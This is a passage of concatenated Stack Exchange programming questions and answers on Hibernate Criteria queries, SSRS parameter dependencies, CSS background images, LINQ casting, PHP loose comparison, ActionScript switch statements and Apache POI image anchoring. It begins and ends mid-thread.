attributes? @aarestad AND attr.value IN (:attrValues) Why wouldn't the following work? return getSession().createCriteria(Item.class) .createAlias("itemAttributes", "ia") .add(Restrictions.or() .add(Restrictions.conjunction() .add(Restrictions.eq("ia.name", "foo1")) .add(Restrictions.eq("ia.attributeValue", "bar1"))) .add(Restrictions.conjunction() .add(Restrictions.eq("ia.name", "foo2")) .add(Restrictions.eq("ia.attributeValue", "bar2")))) .list(); That would be (name=foo1 && attributeValue=bar1) OR (name=foo2 && attributeValue=bar2) This might work for the disjunction, but the conjunction version where I would use Restrictions.and() didn't work. Yes, because that would be saying WHERE x = 1 AND x = 2 essentially, which won't return any results. I can't think of a way to do the conjunction case in raw SQL. You may have to load the disjunction case and then refine that using application logic. I didn't test it, but this is how I should try to solve your problem if I would have to: Map<String,String> map1 = new TreeMap<String,String>(); map1.put("ia.name","foo1"); map1.put("ia.value","bar1"); Map<String,String> map2 = new TreeMap<String,String>(); map2.put("ia.name","foo2"); map2.put("ia.value","bar2"); return getSession().createCriteria(Item.class) .createAlias("itemAttributes", "ia") .add(Restrictions.and() .add(Restrictions.allEq(map1)) .add(Restrictions.allEq(map2)) ) .list(); Please, let me know if it worked. I think the same should work with or()... Use LEFT_OUTER_JOIN to prevent "WHERE x = 1 AND x = 2" kind of issue CreateAlias("itemAttributes", "ia", JoinType.LEFT_OUTER_JOIN)
common-pile/stackexchange_filtered
reportviewer.getparameters retrieves SSRS wromg parameter dependencies I'm using SSRS 2008R2 in an ASP.NET website and use the ReportViewer control to display it. We have a report with 4 parametrs with the follwing dependencies betwwn them: 1. P2 + P3 depend on P1 2. P4 depends on P3 We used ReportViewer.Serverreport.getParameters() function to retrieve the ReportParameterInfo Collection and got the correct data: P1 - 0 dependencies + 2 dependents P2 - 1 dependencies + 1 dependents P3 - 1 dependencies + 0 dependents P4 - 1 dependencies + 0 dependents Now we wanted to enable the report to fit to multiple customers so we added ServerName + DBName parameters to the report and used them in the report's Data Source thus making it dynamic but to my surprise the above function does not retrieve the expected results, I would expect it to say that all the above parameters depend on the ServerName + DBName and the rest of the depencies will remain as they were but I'm getting the follwing result: ServerName - 0 dependencies + 4 dependents - as expected DBName - 0 dependencies + 4 dependents - as expected P1 - 2 dependencies + 3 dependents - **why 3 dependents? should remain 2** P2 - 3 dependencies + 2 dependents - **why 2 dependents? should remain 1** P3 - 4 dependencies + 1 dependents - **why 1 dependents? should remain 0 why 4 dependencies ? should be 3** P4 - 5 dependencies + 0 dependents - **why 5 dependencies ? should be 3** Now, this apperently wrong result makes us a lot of trouble since we have great deal of functionality depending on these parameter dependencies. Did anybody encounter something similar, any ideas? workarounds?
common-pile/stackexchange_filtered
Using CSS for an image within a border I've got some CSS and HTML that I'm working on, I wanted to sub out the content that is a div block for an image and keep the border with rounded edges with it. But the image isn't showing up when I preview the code. The CSS and HTML are linked correctly. Admittedly, this is just me tinkering to learn more about both CSS and HTML. If you could look at this and give me some insight of how to get the image to show up in the rounded box, I would appreciate it. EDIT: I'm afraid I wasn't entirely clear enough on what the issue was. The image in the title tag and that is associated with the "a.title" css code isn't the issue, that's just a header image. The issue is that I want an image to appear in the div class="content" portion of the HTML with the image source coming from the CSS portion that is div.content. I'm pretty bad at explaining my questions/problems, sorry. But thank you for all of your help thus far! HTML: <html> <head> <title>Some Title</title> <link href="/Volumes/lastname/sitename/css/style.css" rel="stylesheet" type="text/css" media="all"> </head> <body> <div id="container"> <p class="title"><img src="/Volumes/last/sitename/media/header3.png"></img></p> <div class="navbar"> <a class="nav" href="http://www.facebook.com">Facebook</a> <a class="nav" href="http://www.twitter.com">Twitter</a> </div> <div class="content"> </div> </div> </body> </html> Here's the CSS - I know its more of the code than you need to know but here any way: body { background: #ffffff width: 1000px; height: 800px; margin: 0 auto; font-family: "Arial"; } #container { width: 900px; height: 800px; margin: 0 auto; } div.content { background-image: url('/Volumes/last/sitename/media/imagename.jpg') no-repeat; border-style: solid; border-width: 2px; width: 900px; height: 500px; margin-top: -20px; border-radius: 7px; border-color: #a0a0a0; } a.title { margin-top:120px; font-size: 36px; } div.navbar { margin-top: -62px; float: right; font-size: 18px; } a.nav { text-decoration: none; color: #717171; padding-right: 20px; } a.nav:hover { color: #1299d6; } div.text { margin-top: 100px; } p.text1 { display: block; text-align: center; } p.text2 { display: block; text-align: center; } p.text3 { display: block; text-align: center; } p.text4 { display: block; text-align: center; } div.links { margin-top: 50px; text-align: center; } a.links { text-decoration: none; color: #ffffff; padding-left: 10px; padding-top: 5px; padding-right: 10px; padding-bottom: 5px; border-radius: 10px; opacity: 0.6; } a.twitter { background: #42a300; } a.contact{ background: #1299d6; } a.subbutton{ background: #690260; } a.links:hover { opacity: 1.0; } First of all your image tag is wrong. It must be <img src="/Volumes/last/sitename/media/header3.png" /> http://jsfiddle.net/vBRBM/ Test the code. I just switched to this, I got caught up in using CSS to link the image and didn't think to actually have the image in the HTML. Thank you very much for your help. I suspect it could have something to do with the URL. maybe try the .. notation? It depends on where the picture is in relation to all your other files. body { background-image:url(' *CHANGE THIS* '); background-repeat:no-repeat; background-position:right top; border-style: solid; border-width: 2px; width: 900px; height: 500px; margin-top: -20px; border-radius: 7px; border-color: #a0a0a0; } img tags don't have anything in them so they don't need a separate closing tag. End it in the same tag by adding the slash on the end /> like <img src="/Volumes/last/sitename/media/imagename.jpg" /> You should take the image out of the div and just make a rule for the class. p.title { background-image: url('/Volumes/last/sitename/media/imagename.jpg') no-repeat right top; border-style: solid; border-width: 2px; width: 900px; height: 500px; margin-top: -20px; border-radius: 7px; border-color: #a0a0a0; }
common-pile/stackexchange_filtered
Linq - InvalidCastException - Why does "where" not filter the invalid types Had a problem in a complex linq query so I simplified it in LINQPad: void Main() { List<basetype> items = new List<basetype>() { new typeA() { baseproperty = "1", extendedproperty = 1 }, new typeB() { baseproperty = "2", extendedproperty = 1.1 }, new typeA() { baseproperty = "3", extendedproperty = 1 }, }; items.Dump(); (from typeA item in items where item is typeA select item).Dump(); } public abstract class basetype { public string baseproperty { get; set; } public string type { get; set; } } public class typeA : basetype { public int extendedproperty { get; set; } public typeA() { type = "A"; } } public class typeB : basetype { public double extendedproperty { get; set; } public typeB() { type = "B"; } } The first Dump works fine and returns: extendedproperty baseproperty type 1 1 A 1.1 2 B 1 3 A However the second Dump errors with: InInvalidCastException: Unable to cast object of type 'typeB' to type 'typeA'. I can fix this by just removing the "typeA" but I wouldn't want to do that in the original statement as I would have to cast the type all over the place: from item in items Interestingly enough, moving the where also fixes this though you might agree that's a bit ugly: from typeA item in items.Where(i => i is typeA) My question is: why is the original where not filtering out the invalid item before the cast is evaluated? Reason #1: The cast to the type happens before the filter because it comes to the left. In C# it is almost always the case that the thing to the left happens before the thing to the right. Reason #2: Suppose we did it your way. You have a List<object> and you say from string s in myObjects where s.Length > 100 and you get an error saying that object doesn't have a Length property - because of course with your way the cast to string happens after the filter, and therefore the filter cannot depend upon the invariant determined by the cast. Presumably you put the cast in there because you want to use the properties of the target type. But you can't have it both ways; either the left operation runs first or the right operation runs first. They can't both run first. Reason #3: There already is a way to do what you want: ... from foos.OfType<Bar>() ... That is equivalent to filtering first and then providing a sequence of just the filtered values of the right type. I can understand this is normal code but when dealing with sets in Linq, much like SQL, it pays to filter the set before operating on each item. It surprises me that Linq does not do this. I would guess that if this were a Linq-to-sql statement it would work. @Chris You seem to be missing the fact that you are defining the filter in your where statement. You are explicitly asking that every item be checked for is typeA. Otherwise the where statement would be moot, because you would iterate over a collection of typeA objects checking whether they are typeA objects. @Jay, not sure I follow your comment. I'm certainly not missing the fact my filter is in the where statement, my issue is that the filter is not applied before the cast. @Chris: I believe the confusion is because there's a cast implied in the from statement as written. The source of the LINQ statement is not items; it's items with each item cast to a typeA. @Chris There is no cast. It is equivalent to foreach (typeA item in items). @Jay, fair point. maybe I should have said declaration not cast @Stephen, I do believe you've hit the nail on the head in that the "from" is the expression "typeA item in items" and not just items. Can you please put that in an answer? The type coercion in both "foreach(X x in xs)" and "from X x in xs" is logically a cast, though no explicit cast operator appears in the source code. In the foreach case, the compiler transforms the code into (X)enumerator.Current, and in the second case, into xs.Cast(). It therefore seems reasonable to refer to both cases as a cast. why is the original where not filtering out the invalid item before the cast is evaluated? Before the where runs, the from must run. (from typeA item in items You have inadvertently cast in your from expression. Remove the TypeA (it is optional) from from and you'll be all set. This is the same as the implicit cast in a foreach statement: foreach(TypeA item in items) //will throw for same reason { if (item is TypeA) I can fix this by just removing the "typeA" but I wouldn't want to do that in the original statement as I would have to cast the type all over the place: You can use either of these solutions: (items.OfType<TypeA>()).Dump(); (from item in items where item is TypeA let itemA = item as TypeA select itemA).Dump(); …in addition to the other answers, note that you can cast the result set in one shot (instead of "all over the place" using .Cast<typeA>() Example: class Program { static void Main(string[] args) { var list = new List<BaseType> {new TypeA(), new TypeB()}; IEnumerable<TypeA> results = list.Where(x => x is TypeA).Cast<TypeA>(); Console.WriteLine("Succeeded. Press any key to quit."); Console.ReadKey(); } public class BaseType{} public class TypeA : BaseType {} public class TypeB : BaseType {} } @David Would you care to elaborate? There is no invalid cast exception in this case.
common-pile/stackexchange_filtered
Problem with actionscript switch not execute first case My problem is that I can't (don't know) make work my switch. Here in my first case, I input "hache", and it doesn't pass through. Strangely, in my trace(traget); [Object hache] or [Object extincteur] (depending on which mc I click on) comes out... Why doesn't it go through the first case? I have no clue. I tried removing the " ". package cem { import flash.display.MovieClip; public class actionObjets{ /*--inventaire--*/ private static var inventaireHache:Boolean = false; private static var inventaireExtincteur:Boolean = false; private var objetClique:MovieClip; public function actionObjets(target) { this.objetClique = target; switch(objetClique){ case "hache": inventaireHache = true; ajouterInventaire(objetClique); break; case "extincteur": inventaireExtincteur = true; ajouterInventaire(objetClique); break; } trace(target); } private function ajouterInventaire(objetEnlever):void{ objetClique.parent.removeChild(objetClique); trace(inventaireHache + " - Hache"); trace(inventaireExtincteur + " - Extincteur"); } } } by the way, target is the movieClip I clicked on a.k.a. Object extincteur, or Object hache. The problem is that objetClique isn't a string. You probably want to do something like switch (objetClique.name). If you want to understand what's going on, rewrite the code this way: if (objetClique == "hache") { // ... } else if (objetClique == "extincteur") { // ... } I hope this illustrates more clearly why the switch doesn't work. objetClique couldn't be equal to the string "hache", because it's not a string. From the looks of it objetClique refers to a DisplayObject and they have a property called name, which is what you want to compare: if (objetClique.name == "hache") { // ... } else if (objetClique.name == "extincteur") { // ... } that code would work, and it's equivalent to a switch that looks like this: switch (objetClique.name) { case "hache": // ... break; case "extincteur": // ... break; } Hummmm! That's pretty much what I need. Now, my problem is: it traces instance7, instance8 etc... Is there a way to name the instances with real names? nvm... I just did some research. whatiwant.name = "nameiwant". Haha what a noob I am! Thx a lot!! You're a great help! I accept your answer! hehe. If this is Flash you can click on the element on the stage and fill in the name in the name field in one of the inspectors. Otherwise you can just to myDisplayObject.name = "helloworld" wherever you have a display object you want to name.
common-pile/stackexchange_filtered
Does a woman have to cover her head if she is bald? The Gemara in Ketubot 72a outlines the issue of married woman covering her hair. This issue has been discussed already on this forum. Rav Yehuda Herzl-Henkin has wonderful and thorough treatment of the subject in Bnei Banim, also available in English here. Obviously the topic is very broad, I merely bring these points up as a preface to my question. The question being, it seems that much of the issues of uncovered hair are centered on Ervah, or at least on the notion of hair being meant to be covered. So if a woman doesn't have hair, it would seem that there is no need for her to cover her scalp. Is there any requirement for a bald woman to wear a kerchief on her head, or perhaps does having a bald head itself fulfill the requirement? (In the verse from which we learn the concept of hair-covering, it uses the word ראש/her head, rather than שער/her hair -- perhaps this is pertinent to the answer.) An adjunct to this question would be: if indeed a scalp-cover is not required, why do the many Chasidic women who shave their heads continue to wear a head cover? Is there a Halachic opinion that requires this, or is that a separate issue? Please bring any sources that support your answer. Maybe chasidos cover their heads because of the five-o'clock shadow. More complete baldness is effected by some drugs, most famously many chemotherapeutic drugs. "it seems that all the issues of uncovered hair are centered on Ervah" I disagree with this entirely. Many sources talk about the issue of Ervah from Brachot 24. And many talk about the issue of covering the head from Ketubot 72. Many talk about both because most practical questions are affected by both issues. Hair is only Ervah bc it's usually covered. If there's no hair, then the scalp is usually covered, and it too is then Ervah, like any other part of the body which is usually covered. @DoubleAA Although I agree with you that it doesn't all come down to Ervah - that was an oversimplification - however, the Gemara in Ketubot is certainly talking about covering hair, not heads. And do you have a source to say that if there's no hair, then the scalp is usually covered? Obviously the scalp is usually covered by hair, by default. But what source is there that without hair, the scalp is usually covered? - Nonetheless, I have edited my oversimplification to be more inclusive. Halichos Yisroel page 268:footnote 6 may be relevant (haven't checked it inside) Halachafortodaycom.blogspot.com says that there is two reasons why a married woman covers her hair. Although a bald woman may not have the problem of Erva, she still is required to cover her hair as a sign that she is married. Q: If a married woman is bald, does she still have to wear a headcovering, or is she permitted to reveal her scalp? A: Besides for the reason that hair is considered “Erva” and must be covered, there is also a reason quoted by the Poskim that a married woman covers her hair as a “sign” that she is married, and this would apply to bald women as well. Also, even women that are bald are usually not 100% bald, and some hair is there. "that a married woman covers her hair as a 'sign' that she is married, and this would apply to bald women as well." I don't understand? Covering her scalp is not the sign that she's married. This quote is self-contradictory. Lovely conjecture. Any source brought, or just "the Poskim"? Upon further looking, I see you didn't even quote the full response on that website. The paragraph ends with a a final sentence: "For Halacha L’Ma’aseh a rav must be consulted." Telling us that whoever the author is doesn't consider this to be Psak or authoritative.
common-pile/stackexchange_filtered
Why string date is equal to 0 I just wondering below code ! I had never seen and heard before .Why string date is equal to 0 ? Is there any documentation for that.. <?php $p = "date"; $n = 0; $m = 1; var_dump($p == $n);//true var_dump($p == $m);//false var_dump($n == $m);//false ?> use === to get false in the first case. And read about comparing in php Is that mean string is always equal to 0 ? @splash58 For future reference : http://stackoverflow.com/questions/80646/how-do-the-php-equality-double-equals-and-identity-triple-equals-comp/80649#80649 when cast 'date' to int what another result do you expect? adn try $p = "2date"; Yes there is documentation: Read and Learn Yes, you compare string with int so string is converted to int first. int from "date" string is 0 That's how it works: Reference : Manual [See the table] Loose comparisons with == "PHP" == 0 is true "PHP" == 1 is false Strict comparisons with === "PHP" === 0 is false "PHP" === 1 is false So is your case with "date" See this you have used == 0 is an int, so in this case it is going to convert 'date' into int. Which is not parseable as one, and will become 0. that is why you are getting true. try === opertor
common-pile/stackexchange_filtered
Are homomorphisms into PGL related to the Schur multiplier? I've been trying to understand homomorphisms from a finite group $G$ into $\operatorname{PGL}(n,R)$ for $n$ a positive integer, and $R$ a commutative ring with 1, usually a field. I had been under the impression that these were induced by homomorphisms from the Darstellungsgruppen of $G$ into $\operatorname{GL}(n,R)$, but I am having doubts. What is wrong with the following example? Take $G$ to be cyclic of order 2. Its Schur multiplier is trivial, so it is its own Darstellungsgruppe. For $r \in R^\times$, set $a=\begin{bmatrix} 0 & 1 \\ r & 0 \end{bmatrix} \in \operatorname{GL}(2,R)$. Then $a^2 = r a^0 \in Z(\operatorname{GL}(2,R))$ so $\bar a$ has order 2 in $\operatorname{PGL}(2,R)$. Consider the homomorphism from $G$ to $\operatorname{PGL}(2,R)$ that sends a generator to $\bar a$. This is not induced by any homomorphism from a covering group of $G$ to $\operatorname{GL}(2,R)$ as long as $r$ has no square root in $R$. Indeed any such homomorphism is determined by where it sends a generator, say to $b$, and to induce the original homomorphism to PGL $\bar b$ must equal $\bar a$. If $\bar b = \bar a$ then $$b=\zeta a = \begin{bmatrix} 0 & \zeta \\ \zeta r & 0 \end{bmatrix} \quad b^2 = \begin{bmatrix} \zeta^2 r & 0 \\ 0 & \zeta^2 r \end{bmatrix}$$ If we want $b$ to have order 2, then $\zeta^2 r = 1$ and $\zeta^2 = \tfrac{1}{r}$, so if $r$ has no square root in $R^\times$, there is no such $b$. Even if we claim the Darstellungsgruppen is cyclic of order 4 (since $H^2(C_2, R^\times)$ is likely equal to $(R^\times)/(R^\times)^2 \cong C_2$) we still need $\zeta^2r = -1$, but if $-1$ is a square in $R$, then $-r$ also has no square root, and it is still a counterexample. We have $H^2(G,R^\times) \cong {\rm Hom}(M(G),R^\times) \oplus {\rm Ext}(G/G',R^\times)$, where $M(G)$ is the Schur multiplier of $G$. If $R^\times$ is divisible (which is true, for example, if $R$ is algebraically closed), then ${\rm Ext}(G/G',R^\times) = 0$, and all extensions arises from a homomorphism from $M(G)$ to $R^\times$, and any homomorphism $G \to {\rm PGL}(2,R)$ lifts to $\hat{G} \to {\rm GL}(2,R)$ for some covering group $\hat{G}$ of $G$. But in general this will not be the case. If I really, really wanted a lift for my $G=C_2$, is this telling me I'd need to define $\hat G$ as an extension of the normal subgroup $R^\times$ with quotient $G/G'=C_2$? I think that roughly corresponds to taking a square root of $r$. Such a covering group is not very impressive, as it is not even finite. (I think I roughly have it now, but I have to head out for a few hours. Will accept tomorrow after I have a chance to prove everything and write out the details.) The following is probably a misguided reinvention of Schur covers. It misses two key property of Schur covers: (1) Schur covers work for all projective representations (over an algebraically closed field simultaneously), and (2) Schur covers have a universal property that makes them minimal. This answer also fails to prove Derek Holt's nice formula (which I assume is the universal coefficients theorem), which loses another important feature: if $G$ is a perfect group, the Schur cover is unique and projective representations (probably) lift over every commutative ring, not just algebraically closed fields. At any rate, these results are enough to show that some sort of covering group exists, and if pressed further, some sort of covering group satisfying (1) is possible as well, though I have no idea if it will satisfy (2). Statements of results A representation group always exists for each projective representation. That is, Proposition: For every $\newcommand{\PGL}{\operatorname{PGL}}\newcommand{\GL}{\operatorname{GL}}\rho : G \to H$ and surjection $\pi:\hat H \to H$ with abelian kernel, there is a group $\hat G$ and homomorphisms $\phi:\hat G \to G$ and $\hat\rho:\hat G \to \hat H$ such that the following diagram commutes: $$\require{AMScd} \begin{CD} \hat G @>{\hat\rho}>> \hat H \\ @V{\phi}VV @V{\pi}VV \\ G @>{\rho}>> H \end{CD} $$ Proposition: We can always take $\ker(\phi) \cong \ker(\pi)$ if we'd like, but if $G$ is finite and $\ker(\pi)$ is $p$-divisible for each prime $p$ dividing the order of $G$, then we can take $\ker(\phi) \leq \{ k \in \ker(\pi) : k^{|G|} =1 \}$. Corollary: In particular, if $H=\PGL(n,R)$ and $\hat H=\GL(n,R)$ for $R$ an integrally closed order in an algebraically closed field, then we can take $\ker(\phi)$ finite and cyclic. Proofs Proof (of first proposition): We begin with the image of $\hat \rho$: For each $g \in G$, choose some preimage $\mu(g) \in \hat H$ of $\rho(g)$ under $\pi$. Thus $\mu:G \to \hat H$ is a function satisfying $\pi(\mu(g)) = \rho(g)$. We define $$\zeta(g,h) = \mu(gh)^{-1} \mu(g) \mu(h)$$ Consider $\pi(\zeta(g,h)) = \pi(\mu(gh))^{-1} \pi(\mu(g)) \pi(\mu(h)) = \rho(gh)^{-1} \rho(g) \rho(h) = \rho(1) =1$, so $$\zeta : G^2 \to \ker(\pi)$$ Now consider $$\zeta(gh,k)\zeta(g,h) = \mu(ghk)^{-1} \mu(gh) \mu(k) \mu(gh)^{-1} \mu(g) \mu(h) = \mu(ghk)^{-1} \mu(g)\mu(h)\mu(k)$$ versus $$\zeta(g,hk)\zeta(h,k) = \mu(ghk)^{-1} \mu(g) \mu(hk) \mu(hk)^{-1} \mu(h) \mu(k) = \mu(ghk)^{-1} \mu(g) \mu(h) \mu(k)$$ hence we get $$\zeta(gh,k) \zeta(g,h) = \zeta(g,hk)\zeta(h,k) \qquad \zeta \in Z^2(G,\ker(\pi))$$ This allows us to define a group $\hat G$ on the set $G \times K$ for any subgroup $K \leq \ker(\pi)$ that contains the image of $\zeta$ by $$\hat G: \qquad (g,k)\cdot (h,l) = (gh,kl\cdot \zeta(g,h))$$ The cocycle condition, $Z^2(G,\ker(\pi))$ is precisely what is needed for $\hat G$ to be a group, that is, for the multiplication to be associative. Define $$\hat \rho :\hat G \to \hat H: (g,k) \mapsto \mu(g) k \qquad \phi:\hat G \to G:(g,k) \mapsto g$$ We calculate that $$\hat \rho( (g,k) \cdot (h,l) ) = \hat \rho((gh,kl\zeta(g,h)) = \mu(gh) kl \mu(gh)^{-1} \mu(g)\mu(h) = \mu(g)k \cdot \mu(h)l = \hat \rho(g,k) \hat \rho(h,l)$$ Hence $\hat \rho$ is a homomorphism. Now we check that $$\pi(\hat \rho((g,k))) = \pi(\mu(g)k) = \pi(\mu(g)) \pi(k) = \rho(g) \cdot 1 = \rho(g) =\rho(\phi((g,k))$$ Hence the diagram commutes as was to be shown. $\square$ Lemma: Define $\tau(h) = \prod_{g \in G} \zeta(g,h)$ for $\zeta \in Z^2(G,K)$. Then $\tau(gh)^{-1} \tau(g) \tau(h) = {\zeta(g,h)}^{|G|}$. Proof (of lemma): Notice $$\begin{array}{rl} {\left(\zeta(h,k)\right)}^{|G|} \cdot \tau(hk) &= \prod_{g \in G} \left( \zeta(g,hk) \zeta(h,k) \right) \\ &= \prod_{g \in G} \left( \zeta(gh,k) \zeta(g,h) \right) \\ &= \left( \prod_{g \in G} \zeta(gh,k) \right) \cdot \left( \prod_{g \in G} \zeta(g,h) \right) \\ & = \tau(k) \cdot \tau(h) \end{array}$$ where the equality for $\tau(k)$ uses the fact that $\{ gh : g \in G \} = \{ g : g \in G \}$. $\square$ Proof (of second proposition): Set $\tau(g)$ as in the lemma, and for each $g$, let $\bar \tau(g)$ be an $n$th root of $\tau(g)$. Set $\bar \mu(g) = \mu(g) / \bar \tau(g)$ and so $$\bar \zeta(g,h) = \mu(gh)^{-1} \mu(g) \mu(h) \bar \tau(gh) \bar \tau(g)^{-1} \bar \tau(h)^{-1}$$ More importantly $$\begin{array}{rl} {\left( \bar \zeta(g,h) \right)}^{|G|} &= {\left(\zeta(g,h)\right)}^{|G|} \cdot {\left( \bar \tau(gh)\right)}^{|G|} \cdot {\left( \bar \tau(g) \right)}^{-|G|} \cdot {\left( \bar \tau(h) \right)}^{-|G|} \\ &= {\left(\zeta(g,h)\right)}^{|G|} \cdot \tau(gh) \tau(g)^{-1} \tau(h)^{-1} \\ &= {\left(\zeta(g,h)\right)}^{|G|} \cdot {\left(\zeta(g,h)\right)}^{-|G|} \\ &= 1 \end{array} $$ It is standard and not hard to check that $\zeta$ and $\bar \zeta$ define isomorphic $\hat G$ if we use the same $K$. The advantage now is that we can view $\bar \zeta \in Z^2(G,K)$ for $K \leq \{ k \in \ker(pi) : k^n = 1\}$. By definition of $\hat G$ and $\phi$, one always has $\ker(\phi)\cong K$, so we are done. $\square$ Proof (of the corollary): The kernel of $\pi$ is exactly $R^\times$. Since $R \leq K$ and $K$ is algebraically closed, $K^\times$ is divisible, so an $n$th root of $\tau(h)$ always exists. Since $R$ is integrally closed in $K$, that $n$th root lies in $R$. Since $\tau(h) \in R^\times$ is a unit, its divisor $\bar \tau(h) \in R^\times$ must also be a unit. Hence the second proposition applies to choose $K \leq \{ r \in R^\times : r^{|G|} =1 \}$, the group of $n$th roots of unity, a finite cyclic group. $\square$
common-pile/stackexchange_filtered
Parse: reset password token Okay, I've googled all the things and can't find this anywhere. Super appreciative if anyone here knows: What is the validation period for the 'reset password' link generated by requestPasswordReset using Parse? From what I can tell, this isn't configurable, but I still need to handle expired links. As you said, you cannot configure default password reset email sent by Parse. If you want a configurable system, Parse provides two email modules in Cloud Code (Mailgun and Mandrill) which you can use to implement your own customized password reset mechanism. So for example, when your user wants to reset their password, you email him a randomly generated code and save it with an expiry timestamp in your database. Then you ask your user to check their email and enter that code in the password reset page. You simply need to check the validity/expiry of the code before resetting their password. Mo, thank you very much, but this does not answer my question. I know about Mailgun, etc. I simply need to know when the created password links expire, if ever. You need to ask that from Parse engineers as the would only know. I simply tried to point you towards a home-brewed alternative solution.
common-pile/stackexchange_filtered
apache poi XSSFClientAnchor not positioning picture with respect to dx1, dy1, dx2, dy2 I am trying to add an image to excel using apach-poi version 3.16. I am able to do that with HSSFWorkbook and XSSFWorkbook. But when i am trying to add spacing for the image i.e if I set dx1, dy1, dx2, dy2 coordinates on XSSFClientAnchor it is not taking effect. Same thing is working on HSSFClientAnchor. I am attaching both classes and corresponding excel file generated. Could you please help me how can i do achieve the same result using XSSFClientAnchor. HSSF Class package poisamples; import java.io.ByteArrayOutputStream; import java.io.File; import java.io.FileInputStream; import java.io.FileOutputStream; import java.io.IOException; import org.apache.poi.ss.usermodel.ClientAnchor.AnchorType; import org.apache.poi.hssf.usermodel.HSSFClientAnchor; import org.apache.poi.hssf.usermodel.HSSFPatriarch; import org.apache.poi.hssf.usermodel.HSSFPicture; import org.apache.poi.hssf.usermodel.HSSFSheet; import org.apache.poi.hssf.usermodel.HSSFWorkbook; public class HSSFImage { public static void main(String[] args) throws IOException { String imageFile = "test.png"; String outputFile = "image-sutpid.xls"; HSSFWorkbook workbook = new HSSFWorkbook(); HSSFSheet sheet = workbook.createSheet("Image"); HSSFClientAnchor anchor = new HSSFClientAnchor(100,100,100,100,(short)0, (short)0, (short)0, (short)3); sheet.setColumnWidth(0, 6000); anchor.setAnchorType(AnchorType.DONT_MOVE_AND_RESIZE); int index = sheet.getWorkbook().addPicture(imageToBytes(imageFile), HSSFWorkbook.PICTURE_TYPE_PNG); HSSFPatriarch patriarch = sheet.createDrawingPatriarch(); HSSFPicture picture = patriarch.createPicture(anchor, index); picture.resize(); FileOutputStream fos = new FileOutputStream(outputFile); workbook.write(fos); } private static byte[] imageToBytes(String imageFilename) throws IOException { File imageFile; FileInputStream fis = null; ByteArrayOutputStream bos; int read; try { imageFile = new File(imageFilename); fis = new FileInputStream(imageFile); bos = new ByteArrayOutputStream(); while ((read = fis.read()) != -1) { bos.write(read); } return (bos.toByteArray()); } finally { if (fis != null) { try { fis.close(); fis = null; } catch (IOException ioEx) { // Nothing to do here } } } } } XSSF Class package poisamples; import java.io.ByteArrayOutputStream; import java.io.File; import java.io.FileInputStream; import java.io.FileOutputStream; import java.io.IOException; import org.apache.poi.xssf.usermodel.XSSFClientAnchor; import org.apache.poi.xssf.usermodel.XSSFDrawing; import org.apache.poi.xssf.usermodel.XSSFPicture; import org.apache.poi.xssf.usermodel.XSSFSheet; import org.apache.poi.xssf.usermodel.XSSFWorkbook; import org.apache.poi.ss.usermodel.ClientAnchor.AnchorType; public class XSSFImage { public static void main(String[] args) throws IOException { String imageFile = "test.png"; String outputFile = "image-sutpid.xlsx"; XSSFWorkbook workbook = new XSSFWorkbook(); XSSFSheet sheet = workbook.createSheet("Image"); XSSFClientAnchor anchor = new XSSFClientAnchor(100,100,100,100,0, 0, 0, 3); sheet.setColumnWidth(0, 6000); anchor.setAnchorType(AnchorType.DONT_MOVE_AND_RESIZE); int index = sheet.getWorkbook().addPicture(imageToBytes(imageFile), XSSFWorkbook.PICTURE_TYPE_PNG); XSSFDrawing patriarch = sheet.createDrawingPatriarch(); XSSFPicture picture = patriarch.createPicture(anchor, index); picture.resize(); FileOutputStream fos = new FileOutputStream(outputFile); workbook.write(fos); } private static byte[] imageToBytes(String imageFilename) throws IOException { File imageFile; FileInputStream fis = null; ByteArrayOutputStream bos; int read; try { imageFile = new File(imageFilename); fis = new FileInputStream(imageFile); bos = new ByteArrayOutputStream(); while ((read = fis.read()) != -1) { bos.write(read); } return (bos.toByteArray()); } finally { if (fis != null) { try { fis.close(); fis = null; } catch (IOException ioEx) { // Nothing to do here } } } } } HSSF Result: XSSF Result: Image used: The problems are the different strange measurement units which Microsoft is using and the fact that the binary file system *.xls and the Office Open XML *.xlsx are very different not only in file storing but in general approaches also. As mentioned in ClientAnchor: "Note - XSSF and HSSF have a slightly different coordinate system, values in XSSF are larger by a factor of Units.EMU_PER_PIXEL". But this is not the whole truth. The meaning of the dx and dy is totally different. In the binary file system *.xls, the values are dependent on the factor of column-width / default column-width and row-height / default row-height. Don't ask me about the factor 14.75 used in my example. It is just trial&error. To mention about your code is that if you wants resizing the picture to its native size, then only a one cell anchor is needed. This anchors the picture's upper left edge. A two cell anchor only is needed if the anchor shall determining the picture's size. Then the first cell in the anchor anchors the picture's upper left edge while the second cell in the anchor anchors the picture's bottom right edge. The following example uses the measurement unit 1/256th of a character width for dx since column widths also are in this measurement unit. And it uses point as measurement unit for dy since row heights also are in this measurement unit. import java.io.*; import org.apache.poi.ss.usermodel.*; import org.apache.poi.ss.usermodel.ClientAnchor.AnchorType; import org.apache.poi.util.IOUtils; import org.apache.poi.util.Units; import org.apache.poi.xssf.usermodel.XSSFWorkbook; import org.apache.poi.xssf.usermodel.XSSFSheet; import org.apache.poi.hssf.usermodel.HSSFWorkbook; import org.apache.poi.hssf.usermodel.HSSFSheet; public class CreateExcelWithPictures { private static Picture drawImageOnExcelSheet(Sheet sheet, int col1, int row1, int dx1/*1/256th of a character width*/, int dy1/*points*/, int col2, int row2, int dx2/*1/256th of a character width*/, int dy2/*points*/, String pictureurl, int picturetype, boolean resize) throws Exception { int DEFAULT_COL_WIDTH = 10 * 256; float DEFAULT_ROW_HEIGHT = 12.75f; Row row = sheet.getRow(row1); float rowheight1 = (row!=null)?row.getHeightInPoints():DEFAULT_ROW_HEIGHT; row = sheet.getRow(row2); float rowheight2 = (row!=null)?row.getHeightInPoints():DEFAULT_ROW_HEIGHT; int colwidth1 = sheet.getColumnWidth(col1); int colwidth2 = sheet.getColumnWidth(col2); InputStream is = new FileInputStream(pictureurl); byte[] bytes = IOUtils.toByteArray(is); int pictureIdx = sheet.getWorkbook().addPicture(bytes, picturetype); is.close(); CreationHelper helper = sheet.getWorkbook().getCreationHelper(); Drawing drawing = sheet.createDrawingPatriarch(); ClientAnchor anchor = helper.createClientAnchor(); anchor.setAnchorType(AnchorType.DONT_MOVE_AND_RESIZE); anchor.setRow1(row1); //first anchor determines upper left position if (sheet instanceof XSSFSheet) { anchor.setDy1(dy1 * Units.EMU_PER_POINT); } else if (sheet instanceof HSSFSheet) { anchor.setDy1((int)Math.round(dy1 * Units.PIXEL_DPI / Units.POINT_DPI * 14.75 * DEFAULT_ROW_HEIGHT / rowheight1)); } anchor.setCol1(col1); if 